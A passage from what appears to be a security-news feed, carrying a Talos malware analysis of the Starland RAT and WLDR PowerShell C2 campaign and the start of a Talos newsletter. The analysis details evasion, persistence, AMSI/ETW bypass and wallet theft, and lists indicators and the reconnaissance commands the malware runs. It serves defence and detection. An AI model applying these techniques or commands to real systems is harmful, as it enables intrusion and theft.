domains&#xA0;represent&#xA0;parallel C2 infrastructure used for the same campaign.&#xA0; The domains&#xA0;&#x201C;windowscreenrepairnearme[.]com&#x201D;&#xA0;(which&#xA0;is&#xA0;also likely&#xA0;to be a hijacked&#xA0;domain)&#xA0;and&#xA0;&#x201C;aipythondevs[.]com&#x201D;&#xA0;serve&#xA0;as the&#xA0;primary&#xA0;C2 for the Starland Python RAT. All C2 URLs incorporate a victim hardware identifier derived from the C: drive&#xA0;volume serial number of the victim machine as the final URL path&#xA0;component, enabling the distinct C2 communication for each of the compromised victims. The actor in this campaign has also implemented C2 infrastructure resilience by using a Polygon smart contract&#xA0;(&#x201C;0x6ae382ed2154cc84c6672e4e908cd2c69c1b35ba&#x201D;),&#xA0;which stores an XOR-encrypted fallback C2 domain&#xA0;that is&#xA0;retrievable via a public JSON-RPC call.&#xA0;&#xA0; Talos discovered that the actor controls two&#xA0;Telegram bots,&#xA0;&#x201C;8384531459&#x201D;&#xA0;(&#x201C;skuefq_bot&#x201D;) and&#xA0;&#x201C;7993597060&#x201D;&#xA0;(&#x201C;komandastuk_bot&#x201D;),&#xA0;used for receiving the implant&#x2019;s execution notification beacons,&#xA0;including messages with victim&#x2019;s machine fingerprints and cryptocurrency&#xA0;wallet inventories.&#xA0; Figure&#xA0;3.&#xA0;Actor-controlled&#xA0;Telegram channel.&#xA0; Talos&#x2019;&#xA0;research&#xA0;uncovered a&#xA0;private live&#xA0;Telegram channel&#xA0;called&#xA0;&#x201C;stuk&#xA0;komanda&#x201D;,&#xA0;controlled by the same threat actor.&#xA0;The&#xA0;stuk&#xA0;komanda&#xA0;channel was created on June 5,&#xA0;2025,&#xA0;and has three&#xA0;unknown subscribers. It does not&#xA0;contain&#xA0;any chat groups and appears to be structured like a C2. The channel lists messages in the name of file names that&#xA0;appear to be&#xA0;Windows-based binaries, highlighting that the threat actor&#xA0;has been&#xA0;active since at least June 2025.&#xA0; Figure&#xA0;4.&#xA0;Messages seen&#xA0;on&#xA0;the&#xA0;Telegram channel.&#xA0; Multi-stage attack summary&#xA0;Figure&#xA0;5.&#xA0;Infection chain summary diagram.&#xA0;The threat actor&#xA0;executed&#xA0;a multistage campaign that involves deploying a weaponized HTA&#xA0;downloader via Microsoft HTML Application Host (&#x201C;mshta.exe&#x201D;) on the victim&apos;s machine,&#xA0;likely utilizing&#xA0;a&#xA0;ClickFix&#xA0;technique. The execution of the HTA file results in the downloading and execution of&#xA0;trojanized&#xA0;installers bundled with a malicious Python package, which sends the implant status of the installer to an attacker-controlled Telegram bot. The NSIS script associated with the&#xA0;trojanized&#xA0;installer is designed to execute the malicious byte-compiled Python code encapsulated within the installer file.&#xA0; This&#xA0;initial&#xA0;byte-compiled Python code acts as a loader that decodes and executes an embedded Python RAT, which we are calling Starland RAT, in the victim&apos;s machine memory. Starland RAT offers a wide range of functionalities and has been specifically engineered to&#xA0;operate&#xA0;within the Windows environment. Its capabilities include&#xA0;defense evasion techniques,&#xA0;system reconnaissance,&#xA0;stealing&#xA0;browser data and cryptocurrency&#xA0;wallets, and&#xA0;a fallback C2 connection mechanism that includes a hardcoded C2 URL, as well as a&#xA0;Polygon&#xA0;Ethereum&#xA0;smart&#xA0;contract&#xA0;that serves&#xA0;as a backup. This connection allows it to interact with the smart contract through Eth_call, dynamically resolving the C2 domains. The RAT sends the reconnaissance information to the C2 to register the victim&apos;s machine and is proficient in receiving and executing intermediate payloads in several formats, including&#xA0;shellcode for 64-bit and 32-bit Windows environments, directly executing Windows shell commands, and downloading and executing malicious EXE, MSI, and DLL files.&#xA0; Talos has&#xA0;observed&#xA0;that the threat actor has distinct infection chains for each type of intermediate payload that Starland RAT receives from the C2. In the case of an x64 shellcode intermediate payload, it implants&#xA0;CastleStealer&#xA0;as the final payload.&#xA0;CastleStealer&#xA0;is a .NET stealer that targets credentials, cryptocurrency&#xA0;wallets, Telegram data, and other browser data from the victim&apos;s machine. Similarly, the x32 shellcode implants a variant of the&#xA0;Remcos&#xA0;RAT.&#xA0; Furthermore, Talos has&#xA0;observed&#xA0;that the threat actor executed a Windows&#xA0;shell command through Starland RAT as an intermediate payload to download and execute a PowerShell stager. This stager is&#xA0;associated with an undocumented PowerShell C2 framework, which we track as &#x201C;WLDR C2&#x201D;&#xA0;in alignment with&#xA0;the internal project designation used by the threat actor in the PowerShell scripts. The PowerShell stager is heavily obfuscated and is designed to decrypt an embedded next-stage PowerShell loader. The second-stage PowerShell loader script has capabilities for defense evasion, connects to the C2, downloads a JSON response, and processes this response to execute another embedded PowerShell payload, the WLDR agent, in the victim&apos;s machine memory. The WLDR agent is a bespoke PowerShell script that receives its C2 address through the PowerShell loader injected global variable at the time of execution. The WLDR agent employs capabilities including encrypted HTTP beaconing, comprehensive host reconnaissance, a robust reconnection protocol, and a modular task execution engine to further execute the malicious PowerShell scripts as directed by the threat actor from the WLDR C2 server.&#xA0; Initial&#xA0;vector&#xA0;The threat actor&#xA0;gains&#xA0;initial access to the victim machine&#xA0;potentially&#xA0;through a&#xA0;ClickFix&#xA0;social engineering technique that entices the user to execute a command, which&#xA0;then&#xA0;stealthily downloads and executes a remotely hosted weaponized HTA file. The HTA file runs an embedded VBScript that drops a Windows batch file into the user profile&#x2019;s application temporary folder, which&#xA0;contains&#xA0;instructions to first download and implant a&#xA0;trojanized&#xA0;installer from the attacker-controlled staging domain onto the victim machine.&#xA0; Once the&#xA0;trojanized&#xA0;installer is executed, the batch file sends a notification beacon to an attacker-controlled Telegram bot,&#xA0;&#x201C;8384531459&#x201D;,&#xA0;to confirm successful execution to the threat actor. At the same time, the VBScript&#xA0;establishes&#xA0;persistence under&#xA0;&#x201C;HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run&#x201D;&#xA0;with the generic value&#xA0;&#x201C;MyApp&#x201D;,&#xA0;pointing back to&#xA0;&#x201C;mshta.exe&#x201D;&#xA0;to execute the remotely hosted weaponized HTA file every time the victim logs in to the machine. Talos&#xA0;identified&#xA0;a Russian-language developer comment left in the VBScript (&#x201C;&#x414;&#x43E;&#x431;&#x430;&#x432;&#x43B;&#x435;&#x43D;&#x438;&#x435;&#xA0;&#x43A;&#x43E;&#x43C;&#x430;&#x43D;&#x434;&#x44B;&#xA0;&#x432;&#xA0;&#x430;&#x432;&#x442;&#x43E;&#x437;&#x430;&#x43F;&#x443;&#x441;&#x43A;&#xA0;&#x434;&#x43B;&#x44F;&#xA0;&#x442;&#x435;&#x43A;&#x443;&#x449;&#x435;&#x433;&#x43E;&#xA0;&#x43F;&#x43E;&#x43B;&#x44C;&#x437;&#x43E;&#x432;&#x430;&#x442;&#x435;&#x43B;&#x44F;&#x201D;),&#xA0;indicating&#xA0;that a Russian-speaking actor is conducting this campaign.&#xA0; Figure&#xA0;6.&#xA0;Weaponized HTA file that downloads and executes&#xA0;trojanized&#xA0;installers.&#xA0;Python&#xA0;loader packaged into&#xA0;trojanized&#xA0;installers&#xA0;Talos has&#xA0;observed&#xA0;that the threat actor in this campaign has weaponized software installers by&#xA0;utilizing&#xA0;the&#xA0;Nullsoft&#xA0;Scriptable Install System (NSIS). They have packaged the Python runtime executable&#xA0;&#x201C;pythonw.exe&#x201D;&#xA0;along with a compiled Python loader, which is disguised as a license file named&#xA0;&#x201C;LICENSE.txt&#x201D;.&#xA0;The threat actor has&#xA0;modified&#xA0;the&#xA0;NSI&#xA0;script file of the installer to include instructions for executing&#xA0;the compiled Python loader using the Python runtime executable.&#xA0;&#xA0; Figure&#xA0;7.&#xA0;Install section of the&#xA0;NSI&#xA0;script of a sample&#xA0;trojanized&#xA0;installer.&#xA0;The compiled Python loader is a&#xA0;relatively large&#xA0;file obfuscated with&#xA0;numerous&#xA0;junk functions that perform random arithmetic operations and print randomly generated strings to the standard output. The actual execution logic is confined to six lines in the loader program, implementing XOR decryption using the XOR key 198 (0xC6) to decrypt the encrypted embedded payload of&#xA0;Starland RAT&#xA0;and execute it&#xA0;in the victim machine&apos;s memory. Figure&#xA0;8.&#xA0;Snippet of the decompiled&#xA0;Python loader program.Starland&#xA0;RAT, a&#xA0;Python-based&#xA0;RAT&#xA0;Starland is a Python-based&#xA0;remote&#xA0;access&#xA0;tool (RAT) with the capability to steal cryptocurrency. During its&#xA0;initial&#xA0;execution phase, the RAT resolves and declares all required Windows API function signatures through Python&#x2019;s&#xA0;ctypes&#xA0;interfaces. It directly loads&#xA0;&#x201C;kernel32.dll&#x201D;&#xA0;using&#xA0;WinDLL&#xA0;and explicitly defines the argument types and return types for every Win32 call used later in execution, including VirtualAllocEx,&#xA0;WriteProcessMemory,&#xA0;CreateRemoteThread,&#xA0;VirtualProtectEx,&#xA0;CreateProcessA,&#xA0;QueueUserAPC, and&#xA0;ResumeThread. Custom&#xA0;ctypes&#xA0;Structure subclasses are declared for SECURITY_ATTRIBUTES, STARTUPINFO, and PROCESS_INFORMATION, mirroring the definitions in the Windows SDK. This API mapping mechanism ensures that all injection and process manipulation calls later in execution are ready without further need for Windows API imports or dynamic resolution.&#xA0; Figure&#xA0;9.&#xA0;Snippet of the Starland RAT function for resolving and declaring the Windows API&#xA0;functions.&#xA0;Before any malicious logic executes, the RAT conducts&#xA0;check&#xA0;for anti-analysis environments. First, it compares the logged-on username of the victim machine against a hardcoded list of usernames, which includes known sandbox service accounts and aliases, including&#xA0;WDAGUtilityAccount. Next, the RAT verifies the victim&apos;s computer name against&#xA0;a&#xA0;list of hostnames from recognized sandbox environments, such as Cuckoo,&#xA0;Any.Run, Joe Sandbox, and Hybrid Analysis. If either check matches, the RAT&apos;s execution&#xA0;terminates&#xA0;immediately. Additionally, the RAT examines the Downloads folder for a&#xA0;Zone.Identifier&#xA0;alternate data stream on the&#xA0;trojanized&#xA0;installer file, confirming that the file was obtained via a browser download rather than being uploaded or copied directly.&#xA0; Figure&#xA0;10.&#xA0;Snippet of Starland RAT showing the hardcoded list of usernames and computer names for&#xA0;detection of&#xA0;evasion checks.&#xA0;The RAT&#xA0;establishes&#xA0;persistence before any network communication with the C2 takes place. The primary mechanism involves creating a scheduled task using the PowerShell New-ScheduledTask command, with a randomized name following the pattern PythonLauncher-{3 random characters}. When executed with administrator privileges, the trigger is set to&#xA0;AtLogOn&#xA0;with&#xA0;RunLevel&#xA0;Highest, ensuring the elevated re-execution of the RAT at every user logon. Additionally, a secondary Startup folder LNK shortcut is created via the&#xA0;WScript.Shell&#xA0;COM object, placed in the user&apos;s Startup directory, targeting&#xA0;&#x201C;pythonw.exe&#x201D;&#xA0;with LICENSE.txt&#xA0;as its argument. If the RAT is not already running with elevated privileges, it also&#xA0;attempts&#xA0;UAC elevation via&#xA0;ShellExecuteW&#xA0;with the runasverb, aiming to upgrade the scheduled task to the higher-privilege logon before&#xA0;proceeding.&#xA0; Figure&#xA0;11.&#xA0;Snippet of Starland RAT with the instructions for&#xA0;establishing&#xA0;persistence.&#xA0;It performs system reconnaissance, assembling the victim profile that includes the system hardware-bound unique identifier (HWID), total RAM size of the victim machine, and installed antivirus by executing the following commands:&#xA0; Get-CimInstance -Class Win32_ComputerSystemProduct.UUID&#xA0;&#xA0; wmic memorychip get Capacity&#xA0;&#xA0;&#xA0; Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct The RAT also conducts Active Directory reconnaissance via the PowerShell command Get-WmiObject Win32_ComputerSystem.Domain. If the victim is identified as a member of Active Directory, the RAT executes the following commands to collect information about domain structure, domain controllers, and the victim&#x2019;s domain privileges:&#xA0; whoami && systeminfo && net user {USERNAME} /dom && nltest /dclist For workgroup-only hosts, it executes the whoami /all command. The reconnaissance data collected are staged by the RAT for inclusion during the victim machine registration to the primary C2 domain hardcoded in the RAT program. It also captures a screenshot of the victim machine&apos;s desktop, saves it as a PNG in the RAT&#x2019;s working directory, generates a&#xA0;Base64-encoded string for the PNG file in memory, stages it alongside the reconnaissance data, and deletes the PNG file from the disk.&#xA0; Additionally, it gathers the victim&#x2019;s cryptocurrency assets information by&#xA0;enumerating&#xA0;the desktop&#xA0;cryptocurrency&#xA0;wallets and browser extension wallets, checking for the presence of over 40 cryptocurrency&#xA0;wallets.&#xA0;The collected data&#xA0;is also staged alongside the reconnaissance data and the&#xA0;Base64-encoded screenshot (PNG)&#xA0;data. The&#xA0;RAT consolidates all collected data into a single JSON file, XOR encrypts it with the 5-byte key &#x201C;helo1&#x201D;,&#xA0;Base64-encodes it, and sends it to the primary C2 through&#xA0;an HTTP POST request using the HTTP user-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)&#xA0;AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36.&#xA0;&#xA0; If the primary C2 registration fails, the RAT enables a blockchain-anchored fallback mechanism. An eth_call is triggered via JSON-RPC to the public Polygon RPC endpoint&#xA0;&#x201C;polygon-rpc[.]com&#x201D;,&#xA0;targeting the smart contract &#x201C;0x6ae382ed2154cc84c6672e4e908cd2c69c1b35ba&#x201D; and function selector &#x201C;0xc659f3b8&#x201D; for the latest block. The encrypted hexadecimal string that the RAT receives from the smart contract is XOR-decrypted with the key &#x201C;$m7*rYpry3&#x201D; to recover a fallback domain to which the RAT sends the victim machine registration request along with the reconnaissance and screenshot data.&#xA0; Before transmitting the reconnaissance information to the C2 for the victim&apos;s machine registration, the RAT sends a notification message to the attacker-controlled Telegram bot using hardcoded credentials. The message includes the victim&apos;s public IP address sourced from&#xA0;&#x201C;api64.ipify[.]org&#x201D;,&#xA0;the build name, region locale, computer name presented as a&#xA0;&#x201C;Crew ID&#x201D;&#xA0;field, OS platform and release, processor string, and the hardcoded label&#xA0;&#xA0; \"Windows Defender&#x201D;&#xA0;as the protection application indicator. If any Chrome cryptocurrency&#xA0;wallet extensions or desktop cold wallet applications were detected during the reconnaissance phase, they were also appended to the message of the Telegram bot, providing the threat actor with visibility into the victim profile and cryptocurrency&#xA0;assets before the actual registration of the victim machine to the C2.&#xA0; Figure&#xA0;12.&#xA0;Starland RAT&#x2019;s&#xA0;Telegram bot message beaconing function.After the RAT registers the&#xA0;compromised&#xA0;machine with the C2, it sends a GET request to the C2 server every 50&#xA0;&#x2013;&#xA0;60 seconds. It&#xA0;contains&#xA0;minimal JSON content with two randomly named junk fields and the bot&apos;s unique identifier, encoded using the same XOR key &#x201C;helo1&#x201D; and then&#xA0;Base64&#xA0;encoded. The C2 server responds with one of the&#xA0;four&#xA0;commands supported by the RAT:&#xA0; Commands&#xA0; Action&#xA0; shellexecute&#xA0; Runs an arbitrary shell string via &#x201C;cmd&#xA0;/c&#x201D; or PowerShell and returns the output to the&#xA0;C2 server through&#xA0;HTTP POST&#xA0;request.&#xA0; x32&#xA0; Receives a 32-bit shellcode&#xA0;URL&#xA0;and executes&#xA0;the&#xA0;shellcode that is&#xA0;staged&#xA0;using&#xA0;the&#xA0;asynchronous procedure&#xA0;call&#xA0;(APC), process&#xA0;injection technique.&#xA0; x64&#xA0; Receives a 64-bit shellcode URL and executes the&#xA0;shellcode that is staged using the&#xA0;asynchronous procedure&#xA0;call&#xA0;(APC), process injection technique.&#xA0; download&#xA0;&#xA0; Downloads the&#xA0;payload file to the&#xA0;&#x201C;%TEMP%&#x201D;&#xA0;folder and executes it by file extension, supporting EXE, MSI, DLL,&#xA0;and ZIP formats with&#xA0;appropriate&#xA0;execution&#xA0;methods.&#xA0; HTTP&#xA0;403&#xA0;response&#xA0; Triggers the self-deletion of the RAT file and exits its process, functioning as a kill switch.&#xA0;&#xA0; Figure&#xA0;13.&#xA0;Starland RAT command processing function.&#xA0;Windows&#xA0;shell command deploys&#xA0;bespoke&#xA0;WLDR&#xA0;agent C2&#xA0;implant&#xA0;In the current campaign investigation, Talos discovered that the threat actor executed a&#xA0;curl command to download and execute&#xA0;additional&#xA0;PowerShell script payloads of the WLDR C2 framework from another C2.&#xA0;&#xA0; Figure 14.&#xA0;curl&#xA0;command to download the WLDR stager.WLDR stager&#xA0;The WLDR stager PowerShell script&#xA0;represents&#xA0;the&#xA0;initial&#xA0;stage, where it&#xA0;establishes&#xA0;a loop counter and two&#xA0;boolean&#xA0;flags for execution states. Each state creates a runtime alias for PowerShell command execution, resolving .NET&#xA0;Base64 and byte conversion types through an obfuscated string construction mechanism. It also defines an inline decryption routine that XOR decrypts the next stage, which is the embedded encrypted WLDR downloader PowerShell script, using a dynamically computed XOR key.&#xA0; Figure 15.&#xA0;Snippet of the WLDR PowerShell stager script.&#xA0;WLDR downloader&#xA0;&#xA0;WLDR downloader is a compact HWID-bound loader script. Upon execution, it derives a hardware identifier from the victim&#x2019;s C: drive volume serial number, converts it from hexadecimal to a decimal number, and appends it to two hardcoded C2 URLs for victim-specific payload delivery and a persistent agent task channel. It then issues an&#xA0;HTTP GET&#xA0;request to the C2, and the C2 server only responds to requests whose HWID matches a pre-registered value. The C2 server response is an encrypted JSON envelope&#xA0;containing&#xA0;fields with a&#xA0;Base64-encoded salt, initialization vector, encrypted data, and authentication tag.&#xA0; The WLDR loader processes the JSON response by decrypting the envelope through an inline decryption routine using a derived 64-byte key from a hardcoded plaintext password &#x201C;odg5t8mvssvh&#x201D; and the salt received from the C2 server in the JSON response. This is followed by the decryption of the encrypted data, which is the next stage of the WLDR agent PowerShell C2 memory implant. Before executing the WLDR agent, it writes the C2 URL and the plaintext password into the global PowerShell scope, making both available for the WLDR agent as its C2 address and session encryption key for all&#xA0;subsequent&#xA0;communication with the C2.&#xA0; Figure 16.&#xA0;Snippet of the WLDR PowerShell downloader.Figure 17.&#xA0;Sample JSON response from the C2 server.Bespoke&#xA0;WLDR&#xA0;C2 agent&#xA0;implant&#xA0;The WLDR agent is a fully featured PowerShell remote access client that&#xA0;operates&#xA0;entirely in memory. It implements encrypted C2 communications, concurrent task execution through a managed&#xA0;Runspace&#xA0;engine, and a module delivery framework that provides the threat actor with interactive remote PowerShell execution capabilities on the victim&apos;s machine.&#xA0; Upon execution, the agent initializes the server&apos;s URL to a development placeholder and&#xA0;immediately&#xA0;checks for a globally scoped URL and session encryption password that were set by the WLDR loader script. If found, it overwrites the placeholder with the C2 URL and inherits the session encryption password, while also configuring other operational parameters, including polling interval, HTTP timeout, retry counts for the C2 reconnect cycle, and the number of threads for the&#xA0;Runspace&#xA0;pool.&#xA0; Figure 18.&#xA0;Snippet of the WLDR agent with the configuration parameters.Before&#xA0;initiating&#xA0;the C2 connectivity, it implements a mutex &#x201C;f2j398fj239d8j23dkkskskkkkkkkkk&#x201D; to prevent duplicate instances and performs a dependency check on the inherited session encryption password. If the password is not found, the agent exits its execution. The network communication is encrypted using AES-256-CBC with HMAC-SHA256 in an&#xA0;encryption,&#xA0;then Message Authentication Code (MAC) construction, with session keys derived through PBKDF2-SHA256 over a randomly generated salt at 5,000 iterations. The protocol version tag WSv1 is bound to every MAC computation, with a new random&#xA0;initialization vector (IV)&#xA0;generated for each message.&#xA0; The agent performs reconnaissance via WMI queries, gathering information on antivirus products, network adapter configurations,&#xA0;OS&#xA0;version and build, domain membership, CPU, RAM, administrative privilege status, and UAC policy. A hardware identifier is primarily derived from the C: drive volume serial number; if that fails, it queries the&#xA0;machine&apos;s&#xA0;registry for the GUID or generates a checksum of the host&#xA0;name, which is appended to all C2 URLs. The&#xA0;initial&#xA0;connection to the C2 is&#xA0;established&#xA0;through an&#xA0;HTTP POST&#xA0;that includes the victim machine profile, the infection identifier, protocol version 2.0.0, and the cryptographic session parameters, with a connection retry timing set to 30 seconds. All&#xA0;subsequent&#xA0;traffic is sent to C2 over HTTPS, with headers designed to mimic a Chrome browser session in version 124.&#xA0; Figure 19.&#xA0;Snippet of WLDR agent C2 handshake function.After&#xA0;establishing&#xA0;the initial connection with the C2, the agent polls the C2 server every 10 seconds. The response from the C2 server can include either commands or tasks, with the only hardcoded command in the agent&#xA0;being&#xA0;a kill instruction that triggers instance termination, while tasks are queued for execution.&#xA0; Figure&#xA0;20.&#xA0;Snippet of WLDR agent&#x2019;s C2 polling function.&#xA0;During our research, we&#xA0;observed&#xA0;that the&#xA0;initial&#xA0;response from the C2 was the idle polling interval response, which included empty fields in both the &#x201C;commands&#x201D; and &#x201C;tasks&#x201D; arrays.&#xA0; Figure&#xA0;21.&#xA0;Initial WLDR agent polling response from the C2. Further analysis of the&#xA0;agent&#xA0;program&#xA0;disclosed&#xA0;that the C2 responses&#xA0;to the polling will&#xA0;contain&#xA0;encrypted PowerShell&#xA0;commands or&#xA0;scripts,&#xA0;which&#xA0;are decrypted using the same hardcoded password&#xA0;and executed&#xA0;through one of the two runtime engines&#xA0;defined in&#xA0;the backdoor&#xA0;program.&#xA0;&#xA0; The primary&#xA0;agent execution&#xA0;engine is a PowerShell&#xA0;RunspacePool&#xA0;supporting&#xA0;up to&#xA0;10 concurrent threads.&#xA0;Each PowerShell script payload delivered by the C2 is wrapped with&#xA0;details of execution context and parameters as in scope variables along with event handlers on&#xA0;the script&#x2019;s execution&#xA0;result of&#xA0;output,&#xA0;error,and warnings.&#xA0;These event handlers registered on the output, error,&#xA0;and warning streams are triggered synchronously&#xA0;as the script execution output is produced, packaging results into stream messages and forwards them to the C2 in real time&#xA0;without waiting for the script execution completion.&#xA0;&#xA0; This message streaming capability makes the&#xA0;WLDR agent&#x2019;s&#xA0;Runspace&#xA0;engine&#xA0;favorable&#xA0;for the interactive operations such as&#xA0;continuous&#xA0;monitoring where the command output reaches the threat actor incrementally,&#xA0;rather&#xA0;than after the completion of the script execution.&#xA0;&#xA0; Figure&#xA0;22.&#xA0;WLDR agent function of handling the&#xA0;Runspace&#xA0;engine.&#xA0;If the&#xA0;Runspace&#xA0;engine&#xA0;fails to&#xA0;initialize the payload, PowerShell script execution defaults to standard PowerShell background jobs. It injects parameters and launches the script as a background job; however, unlike the&#xA0;Runspace&#xA0;path, it collects output only after the job completes, making it suitable only for short-lived batch tasks.&#xA0; Figure&#xA0;23.&#xA0;WLDR agent PowerShell job execution handlers.&#xA0;Other payloads of Starland RAT campaign&#xA0;Talos has discovered that the threat actor&#xA0;possesses&#xA0;additional&#xA0;malware, including&#xA0;CastleStealer&#xA0;and&#xA0;Remcos&#xA0;RAT, which can be deployed as payloads to the victim&apos;s machine via the Starland RAT. To deliver these payloads, the threat actor&#xA0;utilizes&#xA0;a custom shellcode loader for both x64 and x32 machines, encapsulating the embedded encrypted binaries of the payloads.&#xA0; The shellcode loader resolves all required Windows APIs entirely at runtime by&#xA0;enumerating&#xA0;the list of loaded modules in the&#xA0;OS&#xA0;memory, iterating through each module&apos;s export directory, and comparing a hash of each function name against stored target values. The shellcode neutralizes both the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) through two sequential bypass mechanisms. The primary technique resolves the target functions AmsiScanBuffer&#xA0;in&#xA0;&#x201C;amsi.dll&#x201D;&#xA0;and&#xA0;EtwEventWrite&#xA0;in&#xA0;&#x201C;ntdll.dll&#x201D;&#xA0;using runtime hash-based API resolution, then overwrites their first bytes in memory with a patch that forces AMSI to always return a clean scan result and the ETW write function to return immediately without writing the output, effectively neutralizing both interfaces. If the primary patching technique fails, the shellcode executes a fallback mechanism where it calls&#xA0;VirtualProtect&#xA0;to temporarily change the target function&apos;s memory page protection value to read-write-execute and writes the same patch bytes directly, then restores the original page protection.&#xA0; Figure 24.&#xA0;Shellcode snippet of instructions for AMSI bypass.&#xA0;Then, it decrypts the embedded encrypted payload blob and decompresses the decrypted data using LZX decompression into a newly&#xA0;allocated&#xA0;memory region. The payload is&#xA0;subsequently&#xA0;dispatched either by the reflective PE injection technique or by .NET CLR loading through the&#xA0;ICorRuntimeHost&#xA0;COM interface for .NET binaries, or through the PowerShell&#xA0;Runspace&#xA0;for PowerShell scripts.&#xA0; Figure 25.&#xA0;Shellcode snippet of decryption function and decrypted payload in memory.&#xA0;Talos discovered that the threat actor&#xA0;can deliver&#xA0;CastleStealer&#xA0;implant&#xA0;through the x64 shellcode and the&#xA0;Remcos&#xA0;RAT through the x32 shellcode variant.&#xA0;&#xA0; CastleStealer&#xA0;is a .NET-based infostealer and credential harvesting implant designed to systematically extract sensitive data from compromised Windows hosts. It incorporates several anti-analysis measures,&#xA0;including a Russian locale exclusion check and a hardcoded build expiry timestamp, ensuring it executes only against genuine targets within a defined operational window. Its credential theft surface is broad, targeting the full Chromium browser family and Firefox through direct SQLite database access, with decryption support for both legacy DPAPI-protected credentials and the AES-GCM application&#xA0;bound encryption scheme. Beyond browser data, it&#xA0;enumerates&#xA0;crypto wallet browser extensions, Discord and Telegram session files, Steam account credentials, and targeted filesystem paths, transmitting all collected material over a TCP socket to&#xA0;the attacker-controlled infrastructure.&#xA0;CastleStealer&#x2019;s&#xA0;secondary payload delivery capability allows the&#xA0;actor&#xA0;to&#xA0;implant further payloads&#xA0;through process injection&#xA0;technique&#xA0;or PowerShell&#xA0;script&#xA0;execution.&#xA0;&#xA0; Figure 26.&#xA0;Snippet of&#xA0;CastleStealer&#xA0;malware&#xA0;function.&#xA0;Remcos&#xA0;RAT (Remote Control and Surveillance) is a&#xA0;commercial&#xA0;remote access tool originally&#xA0;sold&#xA0;as a legitimate remote administration tool. However, it has been&#xA0;extensively abused by&#xA0;a wide range of&#xA0;threat actors&#xA0;since its emergence in 2016. It provides operators with&#xA0;comprehensive post-exploitation capabilitiesincluding real-time keylogging, screen and webcam capture, audio recording, file management, shell command execution, and clipboard&#xA0;monitoring&#xA0;all&#xA0;communicated over an encrypted channel to a configurable C2 server.&#xA0;&#xA0; Coverage&#xA0;The following ClamAV signature detects and blocks this threat:&#xA0; Txt.Downloader.Agent-10060312-0 Html.Downloader.Agent-10060313-0 Html.Downloader.Agent-10060314-0 Py.Loader.Agent-10060315-0 Py.Loader.Agent-10060316-0 Ps1.Trojan.Agent-10060317-0 Ps1.Trojan.Agent-10060318-0 Ps1.Trojan.WLDRAgent-10060319-0 Ps1.Downloader.Agent-10060320-0 Win.Trojan.CastleStealer-10060341-0 Win.Trojan.Starland_Installer-10060342-0 Win.Malware.Starland-10060343-0 Win.Malware.Remka-10060344-0 The following Snort Rules&#xA0;Snort 2 and Snort 3&#xA0;(SIDs)&#xA0;to&#xA0;detect and block this threat:&#xA0;66787 &#x2013; 66790 and 301580&#xA0;&#xA0; IOCsThe IOCs for this threat are also available at our GitHub repository&#xA0;here.&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threats","rat","cisco-talos-antivirus","cisco-talos-dns-security","cisco-talos-malware-protection","cisco-talos-network-intrusion-prevention","geo:inferred"],"relatedCves":[],"titleFingerprint":"11795-bespoke-campaign-deploys-financially-implant-motivated-novel-rat-starland-uat-wldr","countryCodes":["DE","RO","RU","US","VE"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/uat-11795-deploys-novel-starland-rat-and-bespoke-wldr-c2-implant-in-financially-motivated-campaign/","type":"report","title":"Cisco Talos: UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-07-16T10:00:01.000Z","addedAt":"2026-07-29T20:53:06.649Z","updatedAt":"2026-07-29T20:53:06.649Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"38b8e89d-c7e9-4dda-8be3-1267ec7bba2c","slug":"talos-winning-54-of-the-time-3d60ac36","externalId":"6a4e9186501b2f00010617d0","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Winning 54% of the time","description":"Welcome to this week&#x2019;s Threat Source newsletter.&#xA0; There&#x2019;s a fairly clich&#xE9; phrase in cybersecurity that I&#x2019;m sure our audience is familiar with: Attackers only need to be right once, whereas defenders need to be right 100% of the time.&#xA0;&#xA0; I guess it captures the asymmetry of this industry, but I&#x2019;ve never been entirely comfortable with the phrase because it assumes cybersecurity is a game of perfection. One mistake and it&apos;s over.&#xA0;&#xA0; I&#x2019;ve been watching a lot of Wimbledon this week, as I have done since childhood. In fact, I believe my first words were, &#x201C;C&#x2019;mon Tim!&#x201D; (For our non-U.K. audience, I&#x2019;m referring to tennis player Tim Henman, who made four Wimbledon semi-finals in the late 90s and early 2000s and has a hill in the Wimbledon grounds named after him).&#xA0;&#xA0; Of the &#x201C;big three&#x201D; (or the &#x201C;big four&#x201D; if you&#x2019;re Scottish), my favourite was always Rafa Nadal, but I have to admit there&#x2019;s no one who could deliver a one-handed backhand quite like Roger Federer. I bet that when he swats at a fly, the fly apologises and claps its wings.&#xA0; As I saw him sitting in the Royal Box entirely on his own this week, watching tennis out of pure love of the game while everyone else scoffed their strawberries and cream in the comfort of hospitality, I remembered the commencement speech he gave at Dartmouth a couple of years ago. He told the students that, across his entire career, he won 80% of his matches.&#xA0;&#xA0; But of all the total points he played, he won 54% of them.&#xA0;&#xA0; Tennis is a long game (no one can tell you that more than Novak Djokovic and Felix Auger Aliassime who just played the longest quarter final in Wimbledon&#x2019;s history last night). And, mathematically in tennis, you can lose more points and overall games than your opponent and still win the match. Which point you win matters more than the total amount of points you win.&#xA0;&#xA0; If you go to the IBM SlamTracker right now, you&#x2019;ll see all sorts of stats around when players choose to attack, how often they successfully convert those attacking positions into points, and how often they win points they looked destined to lose (the &#x201C;steal&#x201D; score).&#xA0; Tennis is hundreds of small decisions: When to attack, when to defend, when to be patient, when to let the point develop. Not all of those decisions pan out because, well, you&#x2019;re playing against an opponent who&#x2019;s also making decisions within the point&#x2026; and not a brick wall.&#xA0; In the SOC, it&#x2019;s also about making thousands of judgement calls, using whatever hand you&#x2019;re dealt. And with more context, you&#x2019;re able to know your environment better and make better decisions. You can test more assumptions and follow a hypothesis that might lead somewhere, or nowhere at all.&#xA0; Because that&#x2019;s 